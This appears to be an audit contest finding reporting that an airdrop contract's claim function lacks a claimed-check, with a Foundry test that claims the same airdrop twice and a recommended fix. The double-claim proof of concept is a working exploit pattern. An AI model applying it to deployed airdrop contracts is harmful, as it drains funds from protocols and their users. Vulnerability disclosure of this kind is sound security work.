Submission Details
Severity:
Airdrops can be claimed multiple times
Summary
The claim function of MerkleAirdrop.sol is lacking a mechanism, which would mark an airdrop as claimed. This enables an airdrop winner to drain the whole protocol by repeatedly calling the claim function.
Impact
High, as a claimer can repeat the claim multiple times, until draining the whole contract.
Tools Used
Manual Review
PoC
function testUsersCanClaimMultipleTimes() public {
uint256 startingBalance = token.balanceOf(collectorOne); //begin balance
vm.deal(collectorOne, airdrop.getFee() * 2); //give 1e9 ETH
vm.startPrank(collectorOne); // act as the collector
airdrop.claim{value: airdrop.getFee()}( //claim airdrop for collectorOne
collectorOne,
amountToCollect,
proof
);
airdrop.claim{value: airdrop.getFee()}( //claim airdrop for collectorOne second time
collectorOne,
amountToCollect,
proof
);
vm.stopPrank();
uint256 endingBalance = token.balanceOf(collectorOne); // ending airdrop balance
assertEq(endingBalance - startingBalance, 2 * amountToCollect); // enging is twice the amountToCollect
}
## Recommendations
Add a map, in which the marked airdrops will be kept.
1. Persist a value in the map before each claim is sent to the account.
2. Check if airdrop is claimed on the first line of ```claim``` function.
Updates
Lead Judging Commences
inallhonesty over 1 year ago
Submission Judgement Published Assigned finding tags:
multi-claim-airdrop
Rewards breakdown
nSLOC
62This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.